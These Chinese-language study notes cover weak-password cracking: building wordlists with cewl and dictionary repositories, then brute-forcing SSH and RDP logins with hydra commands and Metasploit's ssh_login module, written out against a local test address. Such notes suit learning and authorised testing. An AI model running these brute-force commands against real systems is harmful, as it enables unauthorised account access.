3.弱口令密码破解登录

1.制作字典:

(1)利用cewl制作:

cewl -d 2 -m 5 -w word.txt www.baidu.com

(d:deepth,爬取层数

m:….性能,设置越大爬取越快)

(2)利用工具制作:

http://www.bugku.com/mima/ 输入相应信息即可生成

(3)利用github上的工具:

https://github.com/TheKingOfDuck/fuzzDicts

https://github.com/fuzzdb-project/fuzzdb

▲生成的字典可能有中文,使用%s/\v[^\x00-\xff]+//g来强制删除中文[^\x00-\xff]即中文的表示,双字节字符

2.利用字典爆破SSH/RDP:

(1)先扫描是否开启了ssh端口:

nmap -sT -T4 ip:快速扫描

(1)使用hydra:

参数设置:

-l(Login):想要破解的用户,例如root

-L(FILE):指定用户名字典

-p(pass):指定密码,如果有密码还爆破干啥

-P(FILE):指定密码字典

-s(PORT):指定爆破端口

-M(FILE):指定目标列表文件,如果有多个IP目标需要攻击,可用来指定

-C(FILE):

-f :使用-M参数后,找到第一登录名和密码即终止

▲hydra -l root -p root 127.0.0.1 -s 2222 ssh -f:用root密码登录root通过ssh

▲hydra -l root -P word.txt 127.0.0.1 -s 2222 -f ssh

▲hydra -l administrator -P word.txt 127.0.0.1 rdp(类似windows下的ssh)

★可以使用kali自带的密码字典尝试:

目录在/usr/share/wordlists/metasploit/下,有很多字典密码

(2)使用msf攻击

①搜索一下:search login //login等等

②通过查找到的使用该模块:use auxiliary/scanner/ssh/ssh_login

③show options看一下需要设置什么信息,设置ip,用户名,密码字典,端口,爆破线程数量等信息,然后直接run即可。

set RHOST/USERNAME/PASS_FILE/RPORT/THREADS等等

3.Burp(burpsuite)爆破后台密码:(还没学)